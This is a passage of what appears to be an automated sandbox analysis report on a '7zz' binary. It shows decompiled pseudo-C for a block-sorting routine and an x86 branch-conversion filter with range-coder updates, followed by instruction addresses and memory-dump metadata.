				intOrPtr _t231;
				void* _t242;
				void* _t244;
				void* _t246;
				void* _t248;
				signed char _t249;
				signed int _t252;
				signed int _t256;
				signed int _t257;
				intOrPtr _t260;
				signed int _t263;
				signed int _t266;
				signed int _t269;
				signed int _t272;
				signed char* _t291;
				signed int _t292;
				signed int* _t294;
				signed int _t296;
				intOrPtr _t297;
				signed int _t305;
				signed int _t310;
				signed int _t315;
				signed int _t320;
				unsigned int _t327;
				void* _t328;
				signed int* _t331;
				signed int _t332;
				void* _t339;
				signed int _t340;
				signed int _t344;
				void* _t345;
				signed int _t346;
				unsigned int _t349;
				intOrPtr _t350;
				signed int _t354;
				void* _t363;
				void* _t364;

				_t291 = __edx;
				_t346 =  *(_t363 + 0x24);
				_t226 = __ecx;
				_t339 = __ecx + _t346 * 4;
				_t195 = memset(_t339, 0, 0x10000 << 2);
				_t364 = _t363 + 0xc;
				_t327 = _t346 - 1;
				 *(_t364 + 0x18) = _t339;
				 *(_t364 + 0x24) = _t327;
				if(_t327 != 0) {
					do {
						 *((intOrPtr*)(_t339 + ((_t291[_t195] & 0x000000ff) << 0x00000008 | _t291[_t195 + 1] & 0x000000ff) * 4)) =  *((intOrPtr*)(_t339 + ((_t291[_t195] & 0x000000ff) << 0x00000008 | _t291[_t195 + 1] & 0x000000ff) * 4)) + 1;
						_t195 = _t195 + 1;
					} while (_t195 < _t327);
				}
				 *((intOrPtr*)(_t339 + (( *(_t195 + _t291) & 0x000000ff) << 0x00000008 |  *_t291 & 0x000000ff) * 4)) =  *((intOrPtr*)(_t339 + (( *(_t195 + _t291) & 0x000000ff) << 0x00000008 |  *_t291 & 0x000000ff) * 4)) + 1;
				_t328 = 0;
				_t200 = 0;
				do {
					_t231 =  *((intOrPtr*)(_t339 + _t200 * 4));
					if(_t231 != 0) {
						_t328 = _t328 + _t231;
					}
					 *((intOrPtr*)(_t339 + _t200 * 4)) = _t328 - _t231;
					_t200 = _t200 + 1;
				} while (_t200 < 0x10000);
				_t349 =  *(_t364 + 0x24);
				_t201 = 0;
				if(_t349 != 0) {
					do {
						 *((intOrPtr*)(_t339 + 0x40000 + _t201 * 4)) =  *((intOrPtr*)(_t339 + ((_t291[_t201] & 0x000000ff) << 0x00000008 | _t291[_t201 + 1] & 0x000000ff) * 4));
						_t201 = _t201 + 1;
					} while (_t201 < _t349);
				}
				 *((intOrPtr*)(_t339 + 0x40000 + _t201 * 4)) =  *((intOrPtr*)(_t339 + ((_t291[_t201] & 0x000000ff) << 0x00000008 |  *_t291 & 0x000000ff) * 4));
				_t202 = 0;
				if(_t349 != 0) {
					do {
						 *((intOrPtr*)(_t226 +  *(_t339 + ((_t291[_t202] & 0x000000ff) << 0x00000008 | _t291[_t202 + 1] & 0x000000ff) * 4) * 4)) = _t202;
						 *(_t339 + ((_t291[_t202] & 0x000000ff) << 0x00000008 | _t291[_t202 + 1] & 0x000000ff) * 4) =  *(_t339 + ((_t291[_t202] & 0x000000ff) << 0x00000008 | _t291[_t202 + 1] & 0x000000ff) * 4) + 1;
						_t202 = _t202 + 1;
					} while (_t202 < _t349);
				}
				 *((intOrPtr*)(_t226 +  *(_t339 + (( *(_t202 + _t291) & 0x000000ff) << 0x00000008 |  *_t291 & 0x000000ff) * 4) * 4)) = _t202;
				 *(_t339 + (( *(_t202 + _t291) & 0x000000ff) << 0x00000008 |  *_t291 & 0x000000ff) * 4) =  *(_t339 + (( *(_t202 + _t291) & 0x000000ff) << 0x00000008 |  *_t291 & 0x000000ff) * 4) + 1;
				_t207 = 0;
				_t331 = _t339 + 8;
				 *(_t364 + 0x14) = 0x4000;
				do {
					_t242 =  *(_t331 - 8) - _t207;
					if(_t242 != 0) {
						_t272 = _t242 - 1;
						if(_t272 != 0) {
							 *(_t226 + _t207 * 4) =  *(_t226 + _t207 * 4) | (_t272 & 0x000003ff | 0xfffff800) << 0x00000014;
							_t320 =  *(_t226 + _t207 * 4);
							if(_t272 >= 0x400) {
								 *(_t226 + _t207 * 4) = _t320 | 0x40000000;
								 *(_t226 + 4 + _t207 * 4) =  *(_t226 + 4 + _t207 * 4) | (_t272 & 0xfffffc00) << 0x0000000a;
							}
						}
						_t207 =  *(_t331 - 8);
					}
					_t244 =  *(_t331 - 4) - _t207;
					if(_t244 != 0) {
						_t269 = _t244 - 1;
						if(_t269 != 0) {
							 *(_t226 + _t207 * 4) =  *(_t226 + _t207 * 4) | (_t269 & 0x000003ff | 0xfffff800) << 0x00000014;
							_t315 =  *(_t226 + _t207 * 4);
							if(_t269 >= 0x400) {
								 *(_t226 + _t207 * 4) = _t315 | 0x40000000;
								 *(_t226 + 4 + _t207 * 4) =  *(_t226 + 4 + _t207 * 4) | (_t269 & 0xfffffc00) << 0x0000000a;
							}
						}
						_t207 =  *(_t331 - 4);
					}
					_t246 =  *_t331 - _t207;
					if(_t246 != 0) {
						_t266 = _t246 - 1;
						if(_t266 != 0) {
							 *(_t226 + _t207 * 4) =  *(_t226 + _t207 * 4) | (_t266 & 0x000003ff | 0xfffff800) << 0x00000014;
							_t310 =  *(_t226 + _t207 * 4);
							if(_t266 >= 0x400) {
								 *(_t226 + _t207 * 4) = _t310 | 0x40000000;
								 *(_t226 + 4 + _t207 * 4) =  *(_t226 + 4 + _t207 * 4) | (_t266 & 0xfffffc00) << 0x0000000a;
							}
						}
						_t207 =  *_t331;
					}
					_t248 = _t331[1] - _t207;
					if(_t248 != 0) {
						_t263 = _t248 - 1;
						if(_t263 != 0) {
							 *(_t226 + _t207 * 4) =  *(_t226 + _t207 * 4) | (_t263 & 0x000003ff | 0xfffff800) << 0x00000014;
							_t305 =  *(_t226 + _t207 * 4);
							if(_t263 >= 0x400) {
								 *(_t226 + _t207 * 4) = _t305 | 0x40000000;
								 *(_t226 + 4 + _t207 * 4) =  *(_t226 + 4 + _t207 * 4) | (_t263 & 0xfffffc00) << 0x0000000a;
							}
						}
						_t207 = _t331[1];
					}
					_t331 =  &(_t331[4]);
					_t123 = _t364 + 0x14;
					 *_t123 =  *(_t364 + 0x14) - 1;
				} while ( *_t123 != 0);
				_t249 = 0;
				if(_t349 != 0) {
					do {
						_t249 = _t249 + 1;
					} while (_t349 >> _t249 != 0);
				}
				 *((intOrPtr*)(_t364 + 0x20)) = 0x20;
				if(0x20 - _t249 > 0xc) {
					 *((intOrPtr*)(_t364 + 0x20)) = 0xc;
				}
				 *(_t364 + 0x14) = 2;
				while(1) {
					_t332 = 0;
					_t350 = 0;
					 *((intOrPtr*)(_t364 + 0x10)) = 0;
					 *(_t364 + 0x24) = 0;
					if( *((intOrPtr*)(_t364 + 0x2c)) <= 0) {
						break;
					} else {
						goto L40;
					}
					do {
						L40:
						_t214 =  *(_t226 + _t332 * 4);
						_t294 = _t226 + _t332 * 4;
						_t344 = _t214 >> 0x00000014 & 0x000003ff;
						_t256 =  !(_t214 >> 0x1f) & 0x00000001;
						if((_t214 & 0x40000000) != 0) {
							_t344 = _t344 + (_t294[1] >> 0x0000000a & 0x003ffc00);
							_t294[1] = _t294[1] & 0x000fffff;
							_t350 =  *((intOrPtr*)(_t364 + 0x10));
						}
						_t345 = _t344 + 1;
						 *_t294 = _t214 & 0x000fffff;
						if(_t256 != 0 || _t345 == 1) {
							_t296 = _t332 - _t350;
							 *(_t226 + _t296 * 4) =  *(_t226 + _t296 * 4) & 0x000fffff;
							_t216 = _t226 + _t296 * 4;
							if(_t350 > 1) {
								_t216[1] = _t216[1] & 0x000fffff;
							}
							_t297 = _t345 + _t350;
							_t166 = _t297 - 1; // -1
							_t257 = _t166;
							 *_t216 =  *_t216 | (_t257 & 0x000003ff) << 0x00000014;
							_t354 =  *_t216;
							if(_t297 > 0x400) {
								_t216[1] = _t216[1] | (_t257 & 0xfffffc00) << 0x0000000a;
								 *_t216 = _t354 | 0x40000000;
							}
							_t350 = _t297;
							 *((intOrPtr*)(_t364 + 0x10)) = _t350;
						} else {
							_t260 =  *((intOrPtr*)(_t364 + 0x2c));
							_t350 = 0;
							 *((intOrPtr*)(_t364 + 0x10)) = 0;
							if( *(_t364 + 0x14) < _t260) {
								_push(_t260);
								_push(0);
								_push(_t226);
								_push( *((intOrPtr*)(_t364 + 0x20)));
								_push(_t345);
								_push(_t332);
								if(E00458D60(_t260,  *(_t364 + 0x14)) != 0) {
									 *(_t364 + 0x24) = _t345 + _t332;
								}
							} else {
								_t219 = 0;
								if(_t345 != 0) {
									 *(_t364 + 0x1c) = _t294;
									do {
										 *((intOrPtr*)( *(_t364 + 0x18) + 0x40000 +  *_t294 * 4)) = _t219 + _t332;
										_t219 = _t219 + 1;
										_t294 =  &(( *(_t364 + 0x1c))[1]);
										 *(_t364 + 0x1c) = _t294;
									} while (_t219 < _t345);
									_t350 =  *((intOrPtr*)(_t364 + 0x10));
								}
							}
						}
						_t332 = _t332 + _t345;
					} while (_t332 <  *((intOrPtr*)(_t364 + 0x2c)));
					_t339 =  *(_t364 + 0x18);
					if( *(_t364 + 0x24) != 0) {
						 *(_t364 + 0x14) =  *(_t364 + 0x14) << 1;
						continue;
					}
					break;
				}
				_t210 = 0;
				if( *((intOrPtr*)(_t364 + 0x2c)) <= 0) {
					return  *((intOrPtr*)(_t339 + 0x40000));
				} else {
					do {
						_t340 =  *(_t226 + _t210 * 4);
						_t252 = _t340 >> 0x00000014 & 0x000003ff;
						if((_t340 & 0x40000000) != 0) {
							_t292 =  *(_t226 + 4 + _t210 * 4);
							_t252 = _t252 + (_t292 >> 0x0000000a & 0x003ffc00);
							 *(_t226 + 4 + _t210 * 4) = _t292 & 0x000fffff;
						}
						 *(_t226 + _t210 * 4) = _t340 & 0x000fffff;
						_t210 = _t210 + _t252 + 1;
					} while (_t210 <  *((intOrPtr*)(_t364 + 0x2c)));
					return  *((intOrPtr*)( *(_t364 + 0x18) + 0x40000));
				}
			}


















































                                                                                  0x00459170
                                                                                  0x00459175
                                                                                  0x00459179
                                                                                  0x0045917d
                                                                                  0x00459189
                                                                                  0x00459189
                                                                                  0x0045918b
                                                                                  0x0045918e
                                                                                  0x00459192
                                                                                  0x00459198
                                                                                  0x004591a0
                                                                                  0x004591ae
                                                                                  0x004591b4
                                                                                  0x004591b5
                                                                                  0x004591a0
                                                                                  0x004591c5
                                                                                  0x004591cb
                                                                                  0x004591cd
                                                                                  0x004591d0
                                                                                  0x004591d0
                                                                                  0x004591d5
                                                                                  0x004591d7
                                                                                  0x004591d7
                                                                                  0x004591dd
                                                                                  0x004591e0
                                                                                  0x004591e1
                                                                                  0x004591e8
                                                                                  0x004591ec
                                                                                  0x004591f0
                                                                                  0x004591f2
                                                                                  0x00459203
                                                                                  0x0045920a
                                                                                  0x0045920b
                                                                                  0x004591f2
                                                                                  0x0045921e
                                                                                  0x00459225
                                                                                  0x00459229
                                                                                  0x00459230
                                                                                  0x00459241
                                                                                  0x00459252
                                                                                  0x00459258
                                                                                  0x00459259
                                                                                  0x00459230
                                                                                  0x0045926c
                                                                                  0x0045927b
                                                                                  0x00459281
                                                                                  0x00459283
                                                                                  0x00459286
                                                                                  0x00459290
                                                                                  0x00459293
                                                                                  0x00459295
                                                                                  0x00459297
                                                                                  0x00459298
                                                                                  0x004592ab
                                                                                  0x004592ae
                                                                                  0x004592b7
                                                                                  0x004592c5
                                                                                  0x004592cf
                                                                                  0x004592cf
                                                                                  0x004592b7
                                                                                  0x004592d1
                                                                                  0x004592d1
                                                                                  0x004592d7
                                                                                  0x004592d9
                                                                                  0x004592db
                                                                                  0x004592dc
                                                                                  0x004592ef
                                                                                  0x004592f2
                                                                                  0x004592fb
                                                                                  0x00459309
                                                                                  0x00459313
                                                                                  0x00459313
                                                                                  0x004592fb
                                                                                  0x00459315
                                                                                  0x00459315
                                                                                  0x0045931a
                                                                                  0x0045931c
                                                                                  0x0045931e
                                                                                  0x0045931f
                                                                                  0x00459332
                                                                                  0x00459335
                                                                                  0x0045933e
                                                                                  0x0045934c
                                                                                  0x00459356
                                                                                  0x00459356
                                                                                  0x0045933e
                                                                                  0x00459358
                                                                                  0x00459358
                                                                                  0x0045935d
                                                                                  0x0045935f
                                                                                  0x00459361
                                                                                  0x00459362
                                                                                  0x00459375
                                                                                  0x00459378
                                                                                  0x00459381
                                                                                  0x0045938f
                                                                                  0x00459399
                                                                                  0x00459399
                                                                                  0x00459381
                                                                                  0x0045939b
                                                                                  0x0045939b
                                                                                  0x0045939e
                                                                                  0x004593a1
                                                                                  0x004593a1
                                                                                  0x004593a1
                                                                                  0x004593ab
                                                                                  0x004593af
                                                                                  0x004593b1
                                                                                  0x004593b1
                                                                                  0x004593b6
                                                                                  0x004593b1
                                                                                  0x004593c1
                                                                                  0x004593c8
                                                                                  0x004593ca
                                                                                  0x004593ca
                                                                                  0x004593d2
                                                                                  0x004593e0
                                                                                  0x004593e0
                                                                                  0x004593e2
                                                                                  0x004593e4
                                                                                  0x004593e8
                                                                                  0x004593f0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004593f6
                                                                                  0x004593f6
                                                                                  0x004593f6
                                                                                  0x004593f9
                                                                                  0x00459408
                                                                                  0x0045940e
                                                                                  0x00459416
                                                                                  0x00459424
                                                                                  0x0045942f
                                                                                  0x00459432
                                                                                  0x00459432
                                                                                  0x0045943b
                                                                                  0x0045943c
                                                                                  0x00459440
                                                                                  0x004594ae
                                                                                  0x004594b0
                                                                                  0x004594b7
                                                                                  0x004594bd
                                                                                  0x004594bf
                                                                                  0x004594bf
                                                                                  0x004594c6
                                                                                  0x004594c9
                                                                                  0x004594c9
                                                                                  0x004594d7
                                                                                  0x004594d9
                                                                                  0x004594e1
                                                                                  0x004594f2
                                                                                  0x004594f5
                                                                                  0x004594f5
                                                                                  0x004594f7
                                                                                  0x004594f9
                                                                                  0x00459447
                                                                                  0x00459447
                                                                                  0x0045944b
                                                                                  0x0045944d
                                                                                  0x00459455
                                                                                  0x00459493
                                                                                  0x00459494
                                                                                  0x00459496
                                                                                  0x00459497
                                                                                  0x00459498
                                                                                  0x00459499
                                                                                  0x004594a1
                                                                                  0x004594a6
                                                                                  0x004594a6
                                                                                  0x00459457
                                                                                  0x00459457
                                                                                  0x0045945b
                                                                                  0x00459461
                                                                                  0x00459465
                                                                                  0x0045946e
                                                                                  0x00459479
                                                                                  0x0045947a
                                                                                  0x0045947d
                                                                                  0x00459481
                                                                                  0x00459485
                                                                                  0x00459485
                                                                                  0x0045945b
                                                                                  0x00459455
                                                                                  0x004594fd
                                                                                  0x004594ff
                                                                                  0x0045950e
                                                                                  0x00459512
                                                                                  0x00459514
                                                                                  0x00000000
                                                                                  0x00459514
                                                                                  0x00000000
                                                                                  0x00459512
                                                                                  0x0045951d
                                                                                  0x00459523
                                                                                  0x0045958a
                                                                                  0x00459525
                                                                                  0x00459525
                                                                                  0x00459525
                                                                                  0x0045952d
                                                                                  0x00459539
                                                                                  0x0045953b
                                                                                  0x0045954a
                                                                                  0x00459552
                                                                                  0x00459552
                                                                                  0x0045955c
                                                                                  0x0045955f
                                                                                  0x00459563
                                                                                  0x0045957a
                                                                                  0x0045957a

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: YA1
                                                                                  • API String ID: 0-613462611
                                                                                  • Opcode ID: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                                                                                  • Instruction ID: dd7e7172c6b64ed9de0095458c467a227dd947ad75ddcf7282d203c4dea92fff
                                                                                  • Opcode Fuzzy Hash: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                                                                                  • Instruction Fuzzy Hash: 6FD1F1715046168FD729CF1DC494236BBE1EF86305F094ABEED928B386D7389D19CB48
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 004442E0 Relevance: .7, Instructions: 713COMMONCrypto
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 91%
                                                                                  			E004442E0(intOrPtr __ecx) {
				signed int _t310;
				signed int _t312;
				void* _t328;
				signed int _t330;
				signed int _t334;
				intOrPtr _t340;
				signed int _t346;
				signed int _t347;
				intOrPtr _t352;
				signed int _t357;
				signed int _t361;
				signed int _t362;
				signed int _t364;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t384;
				unsigned int _t386;
				signed int _t389;
				signed int _t390;
				signed int _t402;
				unsigned int _t404;
				signed int _t407;
				signed int _t411;
				void* _t414;
				signed int _t420;
				signed int _t423;
				signed int _t424;
				signed int _t428;
				signed int _t437;
				signed int _t443;
				signed int _t446;
				signed int _t447;
				signed int _t450;
				signed int _t451;
				signed char _t452;
				signed char _t453;
				signed char _t460;
				signed int _t461;
				signed char _t462;
				intOrPtr* _t483;
				signed int _t486;
				void* _t490;
				signed int _t493;
				signed int _t494;
				intOrPtr* _t499;
				signed int _t517;
				signed int _t545;
				intOrPtr _t548;
				intOrPtr _t567;
				unsigned int _t568;
				intOrPtr _t569;
				signed int _t580;
				unsigned int _t582;
				intOrPtr _t589;
				signed int _t593;
				signed int _t597;
				intOrPtr _t607;
				void* _t611;
				signed int _t612;
				signed int _t613;
				intOrPtr _t614;
				signed int _t615;
				intOrPtr _t616;
				signed int _t623;
				signed int _t624;
				signed int _t625;
				signed int* _t626;
				signed int _t627;
				intOrPtr _t628;
				intOrPtr* _t629;
				signed int _t630;
				signed int* _t631;
				signed int _t632;
				signed int _t634;
				signed int* _t640;
				intOrPtr _t641;
				intOrPtr _t643;
				intOrPtr _t644;
				void* _t648;
				signed int _t649;
				signed int _t650;
				signed int _t653;
				unsigned int _t657;
				void* _t658;
				intOrPtr _t660;
				void* _t661;

				_push(0xffffffff);
				_push(E004791D0);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t660;
				_t661 = _t660 - 0x60;
				_t607 = __ecx;
				 *((intOrPtr*)(_t661 + 0x10)) = __ecx;
				if( *(_t661 + 0x78) != 1) {
					L141:
					_t310 = 0x80070057;
					L142:
					 *[fs:0x0] =  *((intOrPtr*)(_t661 + 0x70));
					return _t310;
				}
				_t664 =  *(_t661 + 0x94) - 4;
				if( *(_t661 + 0x94) != 4) {
					goto L141;
				}
				if(E00444040(__ecx, _t664) != 0) {
					_t312 =  *(_t661 + 0x84);
					__eflags = _t312;
					 *(_t661 + 0x88) = 0;
					 *((intOrPtr*)(_t661 + 0x58)) = 0;
					 *(_t661 + 0x5c) = 0;
					if(_t312 == 0) {
						L10:
						 *((intOrPtr*)(_t661 + 0x34)) = _t607;
						_t638 =  *(_t661 + 0x8c);
						 *(_t661 + 0x78) = 0;
						_t450 =  *( *(_t661 + 0x80));
						 *(_t661 + 0x28) = _t450;
						L0040EEC1(_t607 + 0x10,  *( *(_t661 + 0x8c)));
						L0040EED0(_t607 + 0x10);
						L0040EEC1(_t607 + 0x38,  *((intOrPtr*)( *(_t661 + 0x8c) + 4)));
						L0040EED0(_t607 + 0x38);
						L0040EEC1(_t607 + 0x60,  *((intOrPtr*)( *(_t661 + 0x8c) + 8)));
						L0040EED0(_t607 + 0x60);
						L0040EEC1(_t607 + 0xa0,  *((intOrPtr*)(_t638 + 0xc)));
						_t640 = _t607 + 0x88;
						L0040EED0( &(_t640[6]));
						_t640[2] = 0;
						_t640[3] = 0;
						_t640[4] = 0xffffffff;
						 *_t640 = 1;
						_t640[1] = 0;
						memset(_t607 + 0xc8, 0x400, 0x102 << 2);
						_t661 = _t661 + 0xc;
						 *(_t661 + 0x14) = 0;
						 *(_t661 + 0x84) = 1;
						 *((intOrPtr*)( *_t450))(_t450, 0x47a4e8, _t661 + 0x14);
						_t451 = 0;
						__eflags = 0;
						 *((intOrPtr*)(_t661 + 0x18)) = 0;
						 *((intOrPtr*)(_t661 + 0x48)) = 0;
						 *((intOrPtr*)(_t661 + 0x4c)) = 0;
						 *(_t661 + 0x80) = 0;
						 *((intOrPtr*)(_t661 + 0x50)) = 0;
						 *((intOrPtr*)(_t661 + 0x54)) = 0;
						 *(_t661 + 0x40) = 0;
						 *(_t661 + 0x44) = 0;
						 *(_t661 + 0x38) = 0;
						 *(_t661 + 0x3c) = 0;
						while(1) {
							_t611 = 0;
							_t328 = 0x20000 - _t451;
							__eflags = 0x20000;
							if(0x20000 == 0) {
								goto L15;
							} else {
								goto L12;
							}
							while(1) {
								L12:
								_t499 =  *((intOrPtr*)(_t661 + 0x24));
								_t653 =  *((intOrPtr*)( *_t499 + 0xc))(_t499,  *((intOrPtr*)( *((intOrPtr*)(_t661 + 0x18)) + 8)) + _t611 + _t451, _t328, _t661 + 0x28);
								__eflags = _t653;
								if(_t653 != 0) {
									break;
								}
								_t443 =  *(_t661 + 0x28);
								__eflags = _t443;
								if(_t443 == 0) {
									goto L15;
								}
								_t611 = _t611 + _t443;
								_t328 = 0x20000 - _t611 - _t451;
								__eflags = 0x20000;
								if(0x20000 != 0) {
									continue;
								}
								goto L15;
							}
							_t437 =  *(_t661 + 0x14);
							 *(_t661 + 0x78) = 0;
							__eflags = _t437;
							if(_t437 != 0) {
								 *((intOrPtr*)( *_t437 + 8))(_t437);
							}
							_t642 =  *((intOrPtr*)(_t661 + 0x10));
							 *(_t661 + 0x78) = 0xffffffff;
							L00437D6C( *((intOrPtr*)(_t661 + 0x10)) + 0x24);
							L00437D6C( *((intOrPtr*)(_t661 + 0x10)) + 0x4c);
							L00437D6C( *((intOrPtr*)(_t661 + 0x10)) + 0x74);
							L00437D6C(_t642 + 0xb4);
							_t310 = _t653;
							goto L142;
							L15:
							_t612 = _t611 + _t451;
							__eflags = _t612 - 5;
							 *(_t661 + 0x20) = _t612;
							if(_t612 < 5) {
								_t648 = 0;
								__eflags = _t612;
								if(__eflags <= 0) {
									L119:
									_t641 =  *((intOrPtr*)(_t661 + 0x10));
									_t613 = E004441E0(_t641, __eflags);
									_t330 =  *(_t661 + 0x14);
									__eflags = _t330;
									 *(_t661 + 0x78) = 0;
									if(_t330 != 0) {
										 *((intOrPtr*)( *_t330 + 8))(_t330);
									}
									 *(_t661 + 0x78) = 0xffffffff;
									L00437D6C(_t641 + 0x24);
									L00437D6C(_t641 + 0x4c);
									L00437D6C(_t641 + 0x74);
									_t334 =  *(_t641 + 0xb4);
									__eflags = _t334;
									if(_t334 != 0) {
										 *((intOrPtr*)( *_t334 + 8))(_t334);
										 *(_t641 + 0xb4) = 0;
									}
									_t310 = _t613;
									goto L142;
								} else {
									goto L107;
								}
								do {
									L107:
									_t614 =  *((intOrPtr*)(_t661 + 0x10));
									_t483 = _t614 + 0x10;
									_t452 =  *((intOrPtr*)( *((intOrPtr*)(_t614 + 8)) + _t648));
									 *( *((intOrPtr*)(_t614 + 0x14)) +  *_t483) = _t452;
									_t340 =  *((intOrPtr*)(_t483 + 4)) + 1;
									__eflags = _t340 -  *((intOrPtr*)(_t483 + 8));
									 *((intOrPtr*)(_t483 + 4)) = _t340;
									if(__eflags == 0) {
										L0040EFBD(_t483, __eflags);
									}
									__eflags = _t452 - 0xe8;
									if(_t452 != 0xe8) {
										__eflags = _t452 - 0xe9;
										if(_t452 != 0xe9) {
											__eflags =  *(_t661 + 0x80) - 0xf;
											if( *(_t661 + 0x80) != 0xf) {
												goto L118;
											}
											__eflags = (_t452 & 0x000000f0) - 0x80;
											if((_t452 & 0x000000f0) != 0x80) {
												goto L118;
											}
											_t486 = 0x101;
											goto L116;
										}
										_t486 = 0x100;
										goto L116;
									} else {
										_t486 =  *(_t661 + 0x80) & 0x000000ff;
										L116:
										_t640[4] = (_t640[4] >> 0xb) *  *(_t614 + 0xc8 + _t486 * 4);
										 *(_t614 + 0xc8 + _t486 * 4) = (0x800 -  *(_t614 + 0xc8 + _t486 * 4) >> 5) +  *(_t614 + 0xc8 + _t486 * 4);
										_t346 = _t640[4];
										__eflags = _t346 - 0x1000000;
										if(_t346 < 0x1000000) {
											_t347 = _t346 << 8;
											__eflags = _t347;
											_t640[4] = _t347;
											E00444C10(_t640);
										}
									}
									L118:
									_t648 = _t648 + 1;
									__eflags = _t648 -  *(_t661 + 0x20);
									 *(_t661 + 0x80) = _t452;
								} while (__eflags < 0);
								goto L119;
							}
							_t615 = _t612 + 0xfffffffb;
							__eflags = _t615;
							 *(_t661 + 0x8c) = 0;
							 *(_t661 + 0x30) = _t615;
							do {
								_t616 =  *((intOrPtr*)(_t661 + 0x10));
								_t649 =  *(_t661 + 0x8c);
								_t453 =  *((intOrPtr*)( *((intOrPtr*)(_t616 + 8)) + _t649));
								_t490 = _t616 + 0x10;
								 *( *((intOrPtr*)(_t616 + 0x10)) +  *((intOrPtr*)(_t616 + 0x14))) = _t453;
								 *(_t661 + 0x94) = _t453;
								_t352 =  *((intOrPtr*)(_t490 + 4)) + 1;
								__eflags = _t352 -  *((intOrPtr*)(_t490 + 8));
								 *((intOrPtr*)(_t490 + 4)) = _t352;
								if(__eflags == 0) {
									L0040EFBD(_t490, __eflags);
								}
								__eflags = (_t453 & 0x000000fe) - 0xe8;
								if((_t453 & 0x000000fe) == 0xe8) {
									L23:
									_t493 =  *((intOrPtr*)( *((intOrPtr*)(_t616 + 8)) + _t649 + 4));
									 *(_t661 + 0x84) = _t493;
									_t567 =  *((intOrPtr*)(_t661 + 0x18));
									 *(_t661 + 0x2c) = 0 << 8 << 8;
									_t79 = _t567 + 5; // 0x5
									_t568 = (0 << 8 << 8) + _t649 + _t79;
									_t357 =  *(_t661 + 0x14);
									__eflags = _t357;
									 *(_t661 + 0x1c) = _t568;
									if(_t357 == 0) {
										__eflags =  *(_t661 + 0x88);
										if( *(_t661 + 0x88) == 0) {
											__eflags = _t493;
											if(_t493 == 0) {
												L64:
												_t494 = 1;
												L65:
												_t453 =  *(_t661 + 0x94);
												__eflags = _t453 - 0xe8;
												if(_t453 != 0xe8) {
													__eflags = _t453 - 0xe9;
													_t361 = (0 | _t453 != 0x000000e9) + 0x100;
													__eflags = _t361;
												} else {
													_t361 =  *(_t661 + 0x80) & 0x000000ff;
												}
												__eflags = _t494;
												if(_t494 == 0) {
													_t569 =  *((intOrPtr*)(_t661 + 0x10));
													_t640[4] = (_t640[4] >> 0xb) *  *(_t569 + 0xc8 + _t361 * 4);
													 *(_t569 + 0xc8 + _t361 * 4) = (0x800 -  *(_t569 + 0xc8 + _t361 * 4) >> 5) +  *(_t569 + 0xc8 + _t361 * 4);
													_t362 = _t640[4];
													__eflags = _t362 - 0x1000000;
													if(_t362 >= 0x1000000) {
														L95:
														_t210 = _t661 + 0x8c;
														 *_t210 =  *(_t661 + 0x8c) + 1;
														__eflags =  *_t210;
														goto L96;
													}
													_t625 = _t640[2];
													__eflags = _t625 - 0xff000000;
													_t640[4] = _t362 << 8;
													if(_t625 < 0xff000000) {
														L89:
														_t460 = _t640[1];
														_t626 =  &(_t640[6]);
														do {
															 *((char*)( *_t626 + _t626[1])) = L0046B2E0(_t640[2], 0x20, _t640[3]) + _t460;
															_t580 = _t626[1] + 1;
															_t626[1] = _t580;
															__eflags = _t580 - _t626[2];
															if(__eflags == 0) {
																L0040EFBD(_t626, __eflags);
															}
															_t460 = _t460 | 0x000000ff;
															_t384 =  *_t640 - 1;
															__eflags = _t384;
															 *_t640 = _t384;
														} while (_t384 != 0);
														_t625 = _t640[2];
														_t386 = _t625 >> 0x18;
														__eflags = _t386;
														_t640[1] = _t386;
														L94:
														_t453 =  *(_t661 + 0x94);
														_t627 = _t625 << 8;
														__eflags = _t627;
														_t640[2] = _t627;
														 *_t640 =  *_t640 + 1;
														_t640[3] = 0;
														goto L95;
													}
													_t389 = L0046B2E0(_t625, 0x20, _t640[3]);
													__eflags = _t389;
													if(_t389 == 0) {
														goto L94;
													}
													goto L89;
												} else {
													_t582 = _t640[4];
													_t628 =  *((intOrPtr*)(_t661 + 0x10));
													_t517 = (_t582 >> 0xb) *  *(_t628 + 0xc8 + _t361 * 4);
													_t640[2] = _t640[2] + _t517;
													asm("adc ebp, 0x0");
													_t640[4] = _t582 - _t517;
													 *(_t628 + 0xc8 + _t361 * 4) =  *(_t628 + 0xc8 + _t361 * 4) - ( *(_t628 + 0xc8 + _t361 * 4) >> 5);
													_t390 = _t640[4];
													__eflags = _t390 - 0x1000000;
													if(_t390 >= 0x1000000) {
														L78:
														__eflags = _t453 - 0xe8;
														 *(_t661 + 0x8c) =  *(_t661 + 0x8c) + 5;
														if(_t453 != 0xe8) {
															_t629 =  *((intOrPtr*)(_t661 + 0x10)) + 0x60;
														} else {
															_t629 =  *((intOrPtr*)(_t661 + 0x10)) + 0x38;
														}
														_t657 =  *(_t661 + 0x1c);
														_t461 = 0x18;
